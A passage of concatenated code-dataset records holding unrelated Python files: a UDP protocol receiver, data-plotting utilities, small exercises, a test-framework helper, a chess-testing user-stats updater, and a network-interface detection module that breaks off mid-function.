print(\"Receiver: Client Tear Down Init\")\n\n p2 = StpPacket()\n p2.isAck = True\n p2.ackNum = p1.sequenceNum - client_isn - 1 + 1 + server_isn + 1\n udp_socket.sendto(p2.to_byte_array(), address)\n log_helper.log_packet('snd', p2)\n\n p3 = StpPacket()\n p3.isFin = True\n p3.sequenceNum = server_isn + 1 + final_seq_no\n udp_socket.sendto(p3.to_byte_array(), address)\n log_helper.log_packet('snd', p3)\n\n while True:\n data, sender_address = udp_socket.recvfrom(argv_port)\n num_seg += 1\n if len(data) == 0:\n break\n p4 = StpPacket()\n p4.from_byte_array(data)\n log_helper.log_packet('rcv', p4)\n if p4.isValid:\n if p4.isAck and p4.ackNum - client_isn - 1 == p3.sequenceNum + 1 - server_isn - 1:\n break\n\n\ndef main():\n global argv_port\n\n global num_received_bytes\n global num_seg\n global num_data_seg\n global num_data_error\n global num_dup_data_seg\n global num_dup_ack\n\n parse_argv()\n\n address = ('127.0.0.1', argv_port)\n udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n udp_socket.bind(address)\n\n client_isn, server_isn = wait_for_handshake(udp_socket)\n\n receive_file(udp_socket, client_isn, server_isn)\n udp_socket.close()\n\n log_helper.log_text('=============================================================')\n log_helper.log_text('Amount of data received (bytes)\\t' + str(num_received_bytes))\n 
log_helper.log_text('Total Segments Received\\t' + str(num_seg))\n log_helper.log_text('Data segments received\\t' + str(num_data_seg))\n log_helper.log_text('Data segments with Bit Errors\\t' + str(num_data_error))\n log_helper.log_text('Duplicate data segments received\\t' + str(num_dup_data_seg))\n log_helper.log_text('Duplicate ACKs sent\\t' + str(num_dup_ack))\n log_helper.log_text('=============================================================')\n log_helper.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":7579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"569367098","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\namazon = pd.read_csv('static/data/amazon_sentiment100_results.csv')\nsst = pd.read_csv('static/data/sst_sentiment100_results.csv')\ntwitter = pd.read_csv('static/data/twitter_sentiment100_results.csv')\n\nstandard = pd.read_csv('static/data/swim_thin.csv')\nplus = pd.read_csv('static/data/swim_plus.csv')\n\nbox = {\"amazon\":amazon, \"sst\":sst, \"twitter\":twitter, \"standard\": standard, \"plus\" : plus}\n\n\ndef colorize(i):\n\tif i%2==0:\n\t\treturn '#ED1C24'\n\telse:\n\t\treturn '#00AEEF'\n\n\ndef plot(data,models):\n\ti = 0\n\tfor m in models:\n\t for d in data:\n\t plt.figure(i)\n\t col = box[d][m]\n\t plt.hist(col, density=True, bins=30, color = colorize(i))\n\t plt.ylabel('Probability');\n\t plt.title(\"{} => {}\".format(d,m))\n\t i+=1\n\nfrom IPython.display import HTML\nHTML('''\n ''')\n\ndef init(URL):\n\treturn(unique(URL[URL.index('?data=')+6:URL.index('&')].split(',')), unique(URL[URL.index('&model=')+7:].split(',')))\n\ndef unique(x):\n\treturn(list(set(x)))\n\n\ndef summarize(data, models):\n\tprint(\"using datasets: '{}\".format(\"','\".join(data)) + \"'\")\n\tprint(\"using models: '{}\".format(\"','\".join(models)) + \"'\")\n\tprint(\"access raw values with 'box[][]'\")\n\tfor d in data:\n\t\ttry:\n\t\t\tdatum = box[d]\n\t\t\ttry:\n\t\t\t\tprint(\"Stimulus mean is {}\".format(datum['label'].mean()))\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tfor m in models:\n\t\t\t\tprint(\"{} => {} = '{}' (mean)\".format(d, m.capitalize(), round(datum[m].mean(),4)))\t\t\n\t\texcept:\n\t\t\tpass\n\n\n\n\n\n\n","sub_path":"front-end/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"322068507","text":"\"\"\"\nIterating multiple lists at the same time\n\"\"\"\n\nl1 = [1, 9, 3]\nl2 = [6, 7, 8, 20, 30, 40]\n\nfor a, b in zip(l1, l2): # Zip() creates the pairs of elements when two lists passed into the function.\n # Stops at the end of the shorter list.\n # print(a)\n # print(b)\n if a > b:\n print(a)\n else:\n print(b)","sub_path":"Program Control Flow/multiple_list.py","file_name":"multiple_list.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307387527","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\b3\\storage\\cursor.py\n# Compiled at: 2016-03-08 18:42:10\n\n\nclass Cursor(object):\n _cursor = None\n _conn = None\n fields = None\n lastrowid = 0\n rowcount = 0\n EOF = False\n\n def __init__(self, cursor, conn):\n \"\"\"\n Object 
constructor.\n :param cursor: The opened result cursor.\n :param conn: The database connection instance.\n \"\"\"\n self._cursor = cursor\n self._conn = conn\n self.rowcount = self._cursor.rowcount\n self.lastrowid = self._cursor.lastrowid\n try:\n self.EOF = self.moveNext()\n except Exception:\n self.EOF = not self.fields or self.rowcount <= 0 or not self._cursor\n\n def moveNext(self):\n \"\"\"\n Move the cursor to the next available record.\n :return True if there is one more record, False otherwise.\n \"\"\"\n if not self.EOF:\n self.fields = self._cursor.fetchone()\n self.EOF = not self.fields or not self._cursor\n if self.EOF:\n self.close()\n return self.EOF\n\n def getOneRow(self, default=None):\n \"\"\"\n Return a row from the current result set and close it.\n :return The row fetched from the result set or default if the result set is empty.\n \"\"\"\n if self.EOF:\n return default\n row = self.getRow()\n self.close()\n return row\n\n def getRow(self):\n \"\"\"\n Return a result set row into a dict.\n :return The result set row or an empty dict if there are no more records in this result set.\n \"\"\"\n if self.EOF:\n return dict()\n d = dict()\n desc = self._cursor.description\n for i in xrange(0, len(self.fields)):\n d[desc[i][0]] = self.fields[i]\n\n return d\n\n def getValue(self, key, default=None):\n \"\"\"\n Return a value from the current result set row.\n :return The value extracted from the result set or default if the given key doesn't match any field.\n \"\"\"\n row = self.getRow()\n if key in row:\n return row[key]\n return default\n\n def close(self):\n \"\"\"\n Close the active result set.\n \"\"\"\n if self._cursor:\n self._cursor.close()\n self._cursor = None\n self.EOF = True\n return","sub_path":"pycfiles/b3-1.10.10-py2.7/cursor.py","file_name":"cursor.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"14902442","text":"N, X = list(map(int, input().split()))\nx = list(map(int, input().split()))\n\ndiff = [abs(i - X) for i in x]\n\ndef gcd(a, b):\n if a < b:\n a, b = b, a\n if b == 0:\n return a\n c = a % b\n return gcd(b, c)\n\nans = diff[0]\n\nfor i in range(N - 1):\n ans = gcd(ans, diff[i + 1])\n\nprint(ans)","sub_path":"AtCoder/ABC/109/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"282773928","text":"import argparse\nimport os\n\n\nclass BaseSettings:\n\n\n def __init__(self):\n #if not os.path.exists(self.date):\n # os.mkdir(self.date)\n if not os.path.exists(self.records_dir):\n os.mkdir(self.records_dir)\n\n\n self.parser = argparse.ArgumentParser()\n self.parser.add_argument('-v', dest='verbose', type=int, default=0)\n self.parser.add_argument('-e', dest='exitonerror', action=\"store_true\", help=\"exit on error\") # not yet\n self.parser.add_argument('-t', dest='dryrun', action=\"store_true\", help='dry run')\n\n def parse_args(self):\n #just one copy of this for the class, parsed once all arguments are registered\n BaseSettings.args = self.parser.parse_args()\n\n\n def cluck(self, msg, vlevel=5):\n '''\n a message which would generate loads of lines would be like self.cluck('blah', 9).\n A really important, rare message like self.cluck('blah', 2)\n Expect half the messages to be emitted with a -v 5 invocation\n '''\n if self.args.verbose >= vlevel:\n print(msg)\n \n\nif __name__ == \"__main__\":\n\n\n class Settings(BaseSettings):\n # settings here\n records_dir = 'downloaded'\n def __init__(self):\n BaseSettings.__init__(self)\n \n 
self.parser.description = 'test app'\n self.parser.add_argument(\n '-o', dest='old_too', action=\"store_true\", \n help='download old podcasts too'\n )\n\n self.parser.add_argument('-r', dest='norandom', action=\"store_true\")\n self.parse_args()\n \n \n class MyApp(Settings):\n \n def __init__(self, var=None):\n self.var = var\n \n Settings.__init__(self)\n \n def tst(self):\n print(\"tst\")\n \n \n a = MyApp()\n a.cluck(a.records_dir)\n a.tst()\n","sub_path":"BaseSettings.py","file_name":"BaseSettings.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"99191748","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\nfrom task.tieba import get_title, get_pics, get_max_page, down_pics\nfrom celery import group\n\n\nurl = 'xxxx'\nmax_page_task = get_max_page.delay(url)\nmax_page = max_page_task.get(timeout=60)\nurls = [ url + '&pn=' + str(i) for i in xrange(1, int(max_page)+1)]\n\nfor u in urls:\n (get_pics.s(u) | down_pics.s())()\n","sub_path":"asyncspider/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"248350730","text":"import numpy as np\r\n\r\ndef f1():\r\n class a:\r\n x=0\r\n y=0\r\n z=True\r\n\r\n w=a()\r\n print(hasattr(a,'t'))\r\n print(hasattr(a,'x'))\r\n print(hasattr(a,'y'))\r\n print(hasattr(a,'s'))\r\n\r\ndef f2():\r\n a=dict()\r\n a['s']=1\r\n print(a)\r\n\r\n\r\ndef f3():\r\n x=np.random.normal(size=(3,4))\r\n print(x)\r\n\r\n\r\ndef f4():\r\n W=np.random.randint(9,size=(2,4))\r\n b=np.random.randint(3,size=4)\r\n print(W)\r\n print(b)\r\n print(np.vstack((W,b)))\r\n\r\ndef f5():\r\n X=np.random.randint(9,size=(2,4))\r\n X_=np.tanh(X)\r\n print(X_)\r\n\r\ndef f6():\r\n N=2\r\n D=4\r\n newD=3\r\n X=np.random.randint(9,size=(N,D))\r\n W=np.random.randint(9,size=(D,newD))\r\n b=np.random.randint(9,size=(1,newD))\r\n X_=np.hstack((X,np.ones((N,1))))\r\n W_=np.vstack((W,b))\r\n print(np.dot(X_,W_))\r\n B=np.dot(np.ones((N,1)),b)\r\n print(np.dot(X,W)+B)\r\n\r\n\r\ndef f7():\r\n W=np.random.randint(9,size=(2,4))\r\n print(W)\r\n print()\r\n print(W-1)\r\n\r\n\r\ndef f8():\r\n a=np.random.randint(7,size = (2,4))\r\n b=np.ones((1,4))\r\n print(a)\r\n print(a+b)\r\n\r\n\r\ndef f9():\r\n a=np.random.normal(size=(1,4))\r\n print(a)\r\n print(a.mean())\r\n print(a.var())\r\n\r\ndef f10():\r\n a=np.random.normal(size=(2,4))\r\n b=np.eye(2)\r\n print(b)\r\n\r\ndef f11():\r\n a = np.random.randint(10,size=(2,3))\r\n print(a)\r\n mx = np.dot(np.max(a,axis=1).reshape((len(a),1)),np.ones((1,len(a[0]))))\r\n print(mx)\r\n c = np.exp(a-mx)\r\n print(c)\r\n sum = np.dot(np.sum(c,axis=1).reshape((len(a),1)),np.ones((1,len(a[0]))))\r\n print(sum)\r\n e = c/sum\r\n print(e)\r\nf11()\r\n","sub_path":"Neural_Net/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"62665825","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurrences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. 
It cannot contain any loops.\n'''\n# test_word = \"abcthefthghith\"\n\n# --------------- Refactored function\n\ndef count_th(word):\n occurrences = 0\n\n def incrementer(word):\n nonlocal occurrences\n try:\n if word.index('th') >= 0:\n new_word = word.replace('th', '', 1)\n occurrences += 1\n incrementer(new_word)\n except:\n return occurrences\n # return occurrences\n\n incrementer(word)\n return occurrences\n\n\n# print(count_th(test_word))\n\n# ------------- Original function\n\n# test_word = \"abcthefthghith\" # Should return 3\n# occurrences = 0\n# def count_th(word):\n# global occurrences\n# try:\n# if word.index('th') >= 0:\n# new_word = word.replace('th', '', 1)\n# occurrences += 1\n# count_th(new_word)\n# except:\n# return occurrences\n# return occurrences\n\n# print(count_th(test_word))","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"115597131","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUtility/common code of library.\n\"\"\"\n\n__author__ = 'Grzegorz Latuszek, Marcin Usielski, Michal Ernst'\n__copyright__ = 'Copyright (C) 2018-2019, Nokia'\n__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com, michal.ernst@nokia.com'\n\nimport logging\nimport time\nimport gc\nimport pprint\nfrom functools import partial\nfrom functools import wraps\nfrom types import FunctionType, MethodType\n\nfrom moler.connection_observer import ConnectionObserver\nfrom moler.exceptions import MolerException\nfrom moler.exceptions import ExecutionException\n\n\nclass MolerTest(object):\n\n @staticmethod\n def steps_end():\n \"\"\"\n You should call this function at the end of your test code with Moler.\n :return: None\n \"\"\"\n MolerTest._was_steps_end = True\n\n @staticmethod\n def error(msg, raise_exception=False, dump=None):\n \"\"\"\n Makes an error (fail the test) and (optional) continue the test flow.\n :param msg: Message to show.\n :param raise_exception: If True then raise an exception (if not in try except block then test will be\n terminated), if False then only show msg and mark error in logs.\n :param dump: If defined then dump object.\n :return: None.\n \"\"\"\n MolerTest._list_of_errors.append(msg)\n MolerTest._error(msg, raise_exception, dump)\n\n @staticmethod\n def info(msg, dump=None):\n \"\"\"\n Shows the message\n :param msg: Message to show.\n :param dump: If defined then dump object.\n :return: None.\n \"\"\"\n msg = MolerTest._get_string_message(msg, dump)\n MolerTest._logger.info(msg)\n\n @staticmethod\n def warning(msg, dump=None):\n \"\"\"\n Shows the message as warning.\n :param msg: Message to show.\n :param dump: If defined then dump object.\n :return: None\n \"\"\"\n msg = MolerTest._get_string_message(msg, dump)\n MolerTest._logger.warning(msg)\n\n @staticmethod\n def _dump(obj):\n \"\"\"\n Dumping objet to moler log.\n :param obj: Object to dump.\n :return: Dumped object as string\n \"\"\"\n msg_str = pprint.pformat(obj, indent=1)\n return msg_str\n\n @staticmethod\n def _get_string_message(msg, dump):\n if dump is not None:\n dump_str = MolerTest._dump(dump)\n msg = \"{}\\n{}\".format(msg, dump_str)\n\n return msg\n\n @staticmethod\n def sleep(seconds, quiet=False):\n \"\"\"\n Add sleep functionality\n TODO: add support to asyncio when runner ready\n :param seconds: Time to sleep (in seconds)\n :param quiet: If True then no info to log about sleeping, if False then sleep info will be logged\n 
:return:\n \"\"\"\n if not quiet:\n MolerTest.info(\"Sleep for {:.2f} seconds.\".format(seconds))\n time.sleep(seconds)\n\n @staticmethod\n def raise_background_exceptions(decorated=\"function\", check_steps_end=False):\n \"\"\"\n Decorates the function, method or class.\n :param decorated: Function, method or class to decorate.\n :param check_steps_end: If True then check if steps_end was called before return the method, if False then do\n not check\n :return: Decorated callable\n \"\"\"\n if callable(decorated):\n # direct decoration\n return MolerTest._decorate(decorated, check_steps_end=check_steps_end)\n else:\n return partial(MolerTest._decorate, check_steps_end=check_steps_end)\n\n # No public methods and fields below:\n\n _was_error = False\n _was_steps_end = False\n _logger = logging.getLogger(\"moler\")\n _list_of_errors = list()\n\n @staticmethod\n def _error(msg, raise_exception=False, dump=None):\n MolerTest._was_error = True\n msg = MolerTest._get_string_message(msg, dump)\n MolerTest._logger.error(msg, extra={'moler_error': True})\n\n if raise_exception:\n raise MolerException(msg)\n\n @staticmethod\n def _steps_start():\n err_msg = MolerTest._prepare_err_msg(None)\n MolerTest._list_of_errors = list() # clean the list for new test\n MolerTest._was_error = False\n MolerTest._was_steps_end = False\n if err_msg:\n prefix = \"Moler caught some error messages during execution. Please check Moler logs for details.\"\\\n \" List of them:\\n\"\n err_msg = \"{} {}\".format(prefix, err_msg)\n MolerTest._error(err_msg)\n\n @staticmethod\n def _prepare_err_msg(caught_exception):\n was_error_in_last_execution = MolerTest._was_error\n err_msg = \"\"\n\n unraised_exceptions = ConnectionObserver.get_unraised_exceptions(True)\n occured_exceptions = list()\n for unraised_exception in unraised_exceptions:\n occured_exceptions.append(unraised_exception)\n if caught_exception:\n occured_exceptions.append(caught_exception)\n\n if was_error_in_last_execution:\n err_msg += \"Moler caught some error messages during execution. 
Please check Moler logs for details.\\n\"\n if len(occured_exceptions) > 0:\n err_msg += \"There were unhandled exceptions from test caught by Moler.\\n\"\n for i, exc in enumerate(occured_exceptions, 1):\n try:\n import traceback\n exc_traceback = ' '.join(traceback.format_tb(exc.__traceback__))\n err_msg += \" {}) {}{}\\n\".format(i, exc_traceback, repr(exc))\n except AttributeError:\n err_msg += repr(exc)\n\n if len(MolerTest._list_of_errors) > 0:\n err_msg += \"Moler caught some error messages during execution:\\n\"\n\n for i, msg in enumerate(MolerTest._list_of_errors, 1):\n err_msg += \" {}) >>{}<<\\n\".format(i, msg)\n\n return err_msg\n\n @staticmethod\n def _check_exceptions_occured(caught_exception=None):\n err_msg = MolerTest._prepare_err_msg(caught_exception)\n\n if err_msg:\n MolerTest._error(err_msg)\n MolerTest._was_error = False\n MolerTest._list_of_errors = list()\n raise ExecutionException(err_msg)\n\n @staticmethod\n def _check_steps_end():\n if not MolerTest._was_steps_end:\n err_msg = \"Method 'steps_end()' was not called or parameter 'check_steps_end' was not set properly.\\n\"\n MolerTest._error(err_msg)\n MolerTest._was_error = False\n raise ExecutionException(err_msg)\n\n @staticmethod\n def _decorate(obj=None, check_steps_end=False):\n # check that decorated function is not staticmethod or classmethod\n if not obj:\n raise ExecutionException(\"Decorator for 'staticmethod' or 'classmethod' not implemented yet.\")\n\n if hasattr(obj, \"__dict__\"):\n if obj.__dict__.items():\n for attributeName in dir(obj):\n if attributeName == \"_already_decorated\":\n break\n\n attribute = getattr(obj, attributeName)\n\n if not attributeName.startswith(\"_\"):\n if isinstance(attribute, (FunctionType, MethodType)):\n setattr(obj, attributeName, MolerTest._wrapper(attribute, check_steps_end=check_steps_end))\n else:\n obj = MolerTest._wrapper(obj, check_steps_end=check_steps_end)\n else:\n raise ExecutionException(\"No '__dict__' in decorated object.\")\n\n return obj\n\n @staticmethod\n def _wrapper(method, check_steps_end):\n if hasattr(method, '_already_decorated') and method._already_decorated:\n return method\n\n @wraps(method)\n def wrapped(*args, **kwargs):\n MolerTest._steps_start()\n caught_exception = None\n try:\n result = method(*args, **kwargs)\n except Exception as exc:\n caught_exception = exc\n finally:\n MolerTest._check_exceptions_occured(caught_exception)\n if check_steps_end:\n MolerTest._check_steps_end()\n gc.collect()\n return result\n\n wrapped._already_decorated = True\n return wrapped\n","sub_path":"moler/util/moler_test.py","file_name":"moler_test.py","file_ext":"py","file_size_in_byte":8359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"167983014","text":"#!/usr/bin/env python3\n\nimport sys\nfrom datetime import datetime, timedelta\n\nfrom fishtest.rundb import RunDb\nfrom fishtest.util import delta_date, diff_date, estimate_game_duration\nfrom pymongo import DESCENDING\n\nnew_deltas = {}\nskip = False\n\n\ndef process_run(run, info, deltas=None):\n global skip\n if deltas and (skip or str(run[\"_id\"]) in deltas):\n skip = True\n return\n if deltas is not None and str(run[\"_id\"]) in new_deltas:\n print(\"Warning: skipping repeated run!\")\n return\n if \"username\" in run[\"args\"]:\n username = run[\"args\"][\"username\"]\n if username in info:\n info[username][\"tests\"] += 1\n else:\n print(\"not in info:\", username)\n return\n\n tc = estimate_game_duration(run[\"args\"][\"tc\"])\n 
for task in run[\"tasks\"]:\n        if \"worker_info\" not in task:\n            continue\n        username = task[\"worker_info\"].get(\"username\", None)\n        if username is None:\n            continue\n        if username not in info:\n            print(\"not in info:\", username)\n            continue\n\n        if \"stats\" in task:\n            stats = task[\"stats\"]\n            num_games = stats[\"wins\"] + stats[\"losses\"] + stats[\"draws\"]\n        else:\n            num_games = 0\n\n        try:\n            info[username][\"last_updated\"] = max(\n                task[\"last_updated\"], info[username][\"last_updated\"]\n            )\n            info[username][\"task_last_updated\"] = max(\n                task[\"last_updated\"], info[username][\"last_updated\"]\n            )\n        except (TypeError, KeyError) as e:\n            # Comparison between a datetime and a string as \"6 hours ago\"\n            info[username][\"last_updated\"] = task[\"last_updated\"]\n        except Exception as e:\n            print(\"Exception updating info[username]:\", e, sep=\"\\n\", file=sys.stderr)\n\n        info[username][\"cpu_hours\"] += float(\n            num_games * int(run[\"args\"].get(\"threads\", 1)) * tc / (60 * 60)\n        )\n        info[username][\"games\"] += num_games\n    if deltas is not None:\n        new_deltas.update({str(run[\"_id\"]): None})\n\n\ndef build_users(machines, info):\n    for machine in machines:\n        games_per_hour = (\n            (machine[\"nps\"] / 1328000.0)\n            * (3600.0 / estimate_game_duration(machine[\"run\"][\"args\"][\"tc\"]))\n            * (int(machine[\"concurrency\"]) // machine[\"run\"][\"args\"].get(\"threads\", 1))\n        )\n        info[machine[\"username\"]][\"games_per_hour\"] += games_per_hour\n\n    users = []\n    for u in info.keys():\n        user = info[u]\n        try:\n            # eg \"11 minutes ago\", \"6 hours ago\", \"Never\"\n            if isinstance(user[\"last_updated\"], str):\n                if \"task_last_updated\" in user:\n                    diff = diff_date(user[\"task_last_updated\"])\n                    user[\"diff\"] = diff.total_seconds()\n                    user[\"last_updated\"] = delta_date(diff)\n            else:\n                # eg \"2022-08-30 01:05:23.656000\", \"0001-01-01 00:00:00\"\n                diff = diff_date(user[\"last_updated\"])\n                user[\"diff\"] = diff.total_seconds()\n                user[\"last_updated\"] = delta_date(diff)\n        except Exception as e:\n            print(\"Exception updating user['diff']:\", e, sep=\"\\n\", file=sys.stderr)\n        users.append(user)\n\n    users = [u for u in users if u[\"games\"] > 0 or u[\"tests\"] > 0]\n    return users\n\n\ndef update_users():\n    rundb = RunDb()\n\n    deltas = {}\n    info = {}\n    top_month = {}\n\n    clear_stats = True\n    if len(sys.argv) > 1:\n        print(\"scan all\")\n    else:\n        deltas = rundb.deltas.find_one()\n        if deltas:\n            clear_stats = False\n        else:\n            deltas = {}\n\n    for u in rundb.userdb.get_users():\n        username = u[\"username\"]\n        top_month[username] = {\n            \"username\": username,\n            \"cpu_hours\": 0,\n            \"games\": 0,\n            \"tests\": 0,\n            \"tests_repo\": u.get(\"tests_repo\", \"\"),\n            \"last_updated\": datetime.min,\n            \"games_per_hour\": 0.0,\n        }\n        if clear_stats:\n            info[username] = top_month[username].copy()\n        else:\n            info[username] = rundb.userdb.user_cache.find_one({\"username\": username})\n            if info[username]:\n                info[username][\"games_per_hour\"] = 0.0\n            else:\n                info[username] = top_month[username].copy()\n\n    for run in rundb.get_unfinished_runs():\n        try:\n            process_run(run, top_month)\n        except Exception as e:\n            print(\n                \"Exception processing run {} for top_month:\".format(run[\"_id\"]),\n                e,\n                sep=\"\\n\",\n                file=sys.stderr,\n            )\n\n    # Step through these in small batches (step size 100) to save RAM\n    step_size = 100\n\n    now = datetime.utcnow()\n    more_days = True\n    last_updated = None\n    while more_days:\n        q = {\"finished\": True}\n        if last_updated:\n            q[\"last_updated\"] = {\"$lt\": last_updated}\n        runs = list(\n            rundb.runs.find(q, 
sort=[(\"last_updated\", DESCENDING)], limit=step_size)\n )\n if len(runs) == 0:\n break\n for run in runs:\n try:\n process_run(run, info, deltas)\n except Exception as e:\n print(\n \"Exception processing run {} for deltas:\".format(run[\"_id\"]),\n e,\n sep=\"\\n\",\n file=sys.stderr,\n )\n if (now - run[\"start_time\"]).days < 30:\n try:\n process_run(run, top_month)\n except Exception as e:\n print(\n \"Exception on run {} for top_month:\".format(run[\"_id\"]),\n e,\n sep=\"\\n\",\n file=sys.stderr,\n )\n elif not clear_stats:\n more_days = False\n last_updated = runs[-1][\"last_updated\"]\n\n if new_deltas:\n new_deltas.update(deltas)\n rundb.deltas.delete_many({})\n rundb.deltas.insert_many([{k: v} for k, v in new_deltas.items()])\n\n machines = rundb.get_machines()\n\n rundb.userdb.user_cache.delete_many({})\n users = build_users(machines, info)\n if users:\n rundb.userdb.user_cache.insert_many(users)\n rundb.userdb.user_cache.create_index(\"username\", unique=True)\n\n rundb.userdb.top_month.delete_many({})\n users_top = build_users(machines, top_month)\n if users_top:\n rundb.userdb.top_month.insert_many(users_top)\n\n # Delete users that have never been active and old admins group\n idle = {}\n for u in rundb.userdb.get_users():\n update = False\n while \"group:admins\" in u[\"groups\"]:\n u[\"groups\"].remove(\"group:admins\")\n update = True\n if update:\n rundb.userdb.save_user(u)\n if \"registration_time\" not in u or u[\n \"registration_time\"\n ] < datetime.utcnow() - timedelta(days=28):\n idle[u[\"username\"]] = u\n for u in rundb.userdb.user_cache.find():\n if u[\"username\"] in idle:\n del idle[u[\"username\"]]\n for u in idle.values():\n # A safe guard against deleting long time users\n if \"registration_time\" not in u or u[\n \"registration_time\"\n ] < datetime.utcnow() - timedelta(days=38):\n print(\"Warning: Found old user to delete:\", str(u[\"_id\"]))\n else:\n print(\"Delete:\", str(u[\"_id\"]))\n rundb.userdb.users.delete_one({\"_id\": u[\"_id\"]})\n\n print(\"Successfully updated {} users\".format(len(users)))\n\n # record this update run\n rundb.actiondb.update_stats()\n\n\nif __name__ == \"__main__\":\n update_users()\n","sub_path":"server/utils/delta_update_users.py","file_name":"delta_update_users.py","file_ext":"py","file_size_in_byte":7781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"464928210","text":"import unittest\nimport random\nimport functions_7_1 as fl\n\n\nclass MyTestCase(unittest.TestCase):\n def test_truth(self):\n s = 'SNDGFNRTJ'\n b = fl.truth(s)\n self.assertTrue(b.islower())\n self.assertFalse(s.islower())\n\n def test_in_rainbow(self):\n rainbow = ['red', 'orange', 'yellow', 'green', 'blue', 'magenta', 'violet']\n colors = rainbow\n color_1 = random.choice(colors)\n color_2 = fl.test_in()\n self.assertIn(color_1, rainbow)\n self.assertNotIn(color_2, rainbow)\n\n def test_greater(self):\n a = int(input())\n b = int(input())\n c = fl.greater(a, b)\n self.assertGreater(c, a)\n\n def test_less(self):\n length = 4\n word = fl.less()\n self.assertLess(len(word), length)\n\n def test_equal(self):\n comedians = {'Michel Palin', 'Terry Jones', 'Graham Chapman', 'John Cleese'}\n pythons = fl.equal()\n self.assertEqual(comedians, pythons)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"7_1 задача.py","file_name":"7_1 задача.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} 
+{"seq_id":"467244079","text":"#\n# Copyright (C) 2013 Zane Thorn\n# Please view the README and LICENSE for more information\n# \n\n'''\nDetects network interfaces available on the machine. If the interface is a wifi\ninterface, it detects potential wifi networks, but does not scan or conenct to\nthem\n'''\n\nfrom util import *\nfrom host import Host\nfrom netifaces import *\nimport platform\nfrom network import *\nfrom ipaddress import ip_interface\n\n_protocol_names = {\n AF_LINK:'mac',\n AF_INET:'ip4',\n AF_INET6:'ip6'\n }\nfor p,n in address_families.items():\n if p not in _protocol_names:\n _protocol_names[p] = n\n\n_platform = platform.system()\nif _platform == 'Windows':\n import winreg\n def get_adapter_name(net_id):\n netkey = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\NetworkCards')\n\n child_count = winreg.QueryInfoKey(netkey)[0]\n for ix in range(child_count):\n child_name = winreg.EnumKey(netkey,ix)\n child_key = winreg.OpenKey(netkey,child_name)\n val_count = winreg.QueryInfoKey(child_key)[1]\n sets = {}\n for vix in range(val_count):\n val = winreg.EnumValue(child_key,vix)\n sets[val[0]] = val[1]\n if sets['ServiceName'] == net_id:\n return sets['Description']\n return net_id\n\nclass NetworkInterface(NetObject):\n def __init__(self,adapter,iface,name):\n self.adapter = adapter\n self.address = iface\n self.name = name\n self.network = Network(self)\n\n def connected(self):\n return not (self.address.is_link_local or self.address.is_loopback)\n\n def __str__(self):\n return self.name\n\nclass NetworkAdapter(NetObject):\n def __init__(self,name):\n self.id = name\n self.name = name\n if _platform == 'Windows':\n self.name = get_adapter_name(name)\n self._me = None\n self.ip4 = None\n self.ip6 = None\n self.reload()\n\n def reload(self):\n net_dict = ifaddresses(self.id)\n for protocol, data in net_dict.items():\n d = data[0]\n if protocol == AF_LINK:\n self.mac = d['addr']\n elif protocol == AF_INET:\n try:\n ip = d['addr']\n iface = ip_interface(ip)\n if 'netmask' in d:\n nmask =d['netmask']\n iface=ip_interface(ip+'/'+nmask)\n self.ip4 = NetworkInterface(self,iface,'ip4')\n except: pass\n elif protocol == AF_INET6:\n try:\n ip = d['addr']\n iface = ip_interface(ip)\n if 'netmask' in d:\n nmask =d['netmask']\n iface=ip_interface(ip+'/'+nmask)\n self.ip4 = NetworkInterface(self,iface,'ip6')\n except: pass\n\n def connected(self):\n if self.ip4 is not None:\n if self.ip4.connected():\n return True\n if self.ip6 is not None:\n if self.ip6.connected():\n return True\n return False\n \n def __str__(self):\n return self.name+' '+self.mac\n\n \n\ndef list_nics():\n return list(get(i) for i in interfaces())\n \ndef get(iface):\n return NetworkAdapter(iface)\n\ndef window(parent):\n raise NotImplemented()\n\ndef _main():\n print('Listing network devices and capabilities:')\n for nic in list_nics():\n if nic.connected():\n 